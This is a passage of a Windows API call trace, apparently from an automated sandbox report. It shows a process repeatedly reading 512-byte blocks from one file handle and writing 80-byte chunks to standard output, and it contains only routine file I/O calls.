lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] GetFileType (hFile=0x50) returned 0x1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] GetFileType (hFile=0x50) returned 0x1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] GetFileType (hFile=0x50) returned 0x1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] GetFileType (hFile=0x50) returned 0x1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] GetFileType (hFile=0x50) returned 0x1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.050] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.050] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.050] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.050] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] GetFileType (hFile=0x50) returned 0x1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] GetFileType (hFile=0x50) returned 0x1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] GetFileType (hFile=0x50) returned 0x1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] GetFileType (hFile=0x50) returned 0x1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] GetFileType (hFile=0x50) returned 0x1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] GetFileType (hFile=0x50) returned 0x1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] GetFileType (hFile=0x50) returned 0x1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] GetFileType (hFile=0x50) returned 0x1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.051] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.051] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.051] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.051] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] GetFileType (hFile=0x50) returned 0x1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] GetFileType (hFile=0x50) returned 0x1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] GetFileType (hFile=0x50) returned 0x1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] GetFileType (hFile=0x50) returned 0x1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] GetFileType (hFile=0x50) returned 0x1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] GetFileType (hFile=0x50) returned 0x1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] GetFileType (hFile=0x50) returned 0x1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] GetFileType (hFile=0x50) returned 0x1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.052] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.052] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.052] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.052] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] GetFileType (hFile=0x50) returned 0x1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] GetFileType (hFile=0x50) returned 0x1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] GetFileType (hFile=0x50) returned 0x1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] GetFileType (hFile=0x50) returned 0x1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] GetFileType (hFile=0x50) returned 0x1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] GetFileType (hFile=0x50) returned 0x1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] GetFileType (hFile=0x50) returned 0x1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] GetFileType (hFile=0x50) returned 0x1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.053] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.053] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.053] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.053] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] GetFileType (hFile=0x50) returned 0x1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] GetFileType (hFile=0x50) returned 0x1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.053] GetFileType (hFile=0x50) returned 0x1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] GetFileType (hFile=0x50) returned 0x1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] GetFileType (hFile=0x50) returned 0x1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] GetFileType (hFile=0x50) returned 0x1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] GetFileType (hFile=0x50) returned 0x1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] GetFileType (hFile=0x50) returned 0x1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.054] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.054] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.054] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.054] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] GetFileType (hFile=0x50) returned 0x1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] GetFileType (hFile=0x50) returned 0x1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.054] GetFileType (hFile=0x50) returned 0x1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] GetFileType (hFile=0x50) returned 0x1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] GetFileType (hFile=0x50) returned 0x1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] GetFileType (hFile=0x50) returned 0x1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] GetFileType (hFile=0x50) returned 0x1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] GetFileType (hFile=0x50) returned 0x1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.055] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.055] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.055] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.055] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] GetFileType (hFile=0x50) returned 0x1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] GetFileType (hFile=0x50) returned 0x1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.055] GetFileType (hFile=0x50) returned 0x1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] GetFileType (hFile=0x50) returned 0x1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] GetFileType (hFile=0x50) returned 0x1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] GetFileType (hFile=0x50) returned 0x1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] GetFileType (hFile=0x50) returned 0x1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] GetFileType (hFile=0x50) returned 0x1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.056] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.056] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.056] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.056] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] GetFileType (hFile=0x50) returned 0x1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] GetFileType (hFile=0x50) returned 0x1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.056] GetFileType (hFile=0x50) returned 0x1 [0131.056] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] GetFileType (hFile=0x50) returned 0x1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] GetFileType (hFile=0x50) returned 0x1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] GetFileType (hFile=0x50) returned 0x1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] GetFileType (hFile=0x50) returned 0x1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] WriteFile (in: hFile=0x50, 